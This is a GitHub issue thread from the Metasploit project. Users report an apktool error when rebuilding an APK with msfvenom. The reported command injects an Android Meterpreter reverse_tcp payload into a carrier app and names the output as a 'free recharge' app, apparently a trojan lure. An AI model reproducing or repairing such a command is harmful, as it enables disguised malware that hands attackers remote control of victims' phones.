### ISSUE TITLE
Msfvenom apktool error 

### ISSUE THREAD

**Issue by phalpreet** [rapid7/metasploit-framework#13722]
I am trying to use the following command:
Sudo Msfvenom -x myairtel.apk -p android/meterpreter/reverse_tcp LHOST=****  LPORT=*****  -o /root/Desktop/myairtelfreerecharge.apk

And the results are :
 no platform was selected 
**
**
**
**
Using apktool 2.4.1
**
**
exception in thread main .org .jf.util.exceptionwithcontext: exception occurred while writing code_item for r method Lo/sJ;→( ) Lo/sJ; 
**
**
**
**
Error: unable to rebuild apk with apktool
 Please help me

**Comment by jjjjjjjj23ws** [comment]
I also get a similar error. I hope @bcoles  is working on solving this issue.

**Comment by bcoles** [comment]
> 
> 
> I also get a similar error. I hope @bcoles is working on solving this issue.

As far as I know, no one is working on this issue or assigned to fix this issue.

@timwr may be able to offer some guidance.

**Comment by harmjay** [comment]
I also get this error.
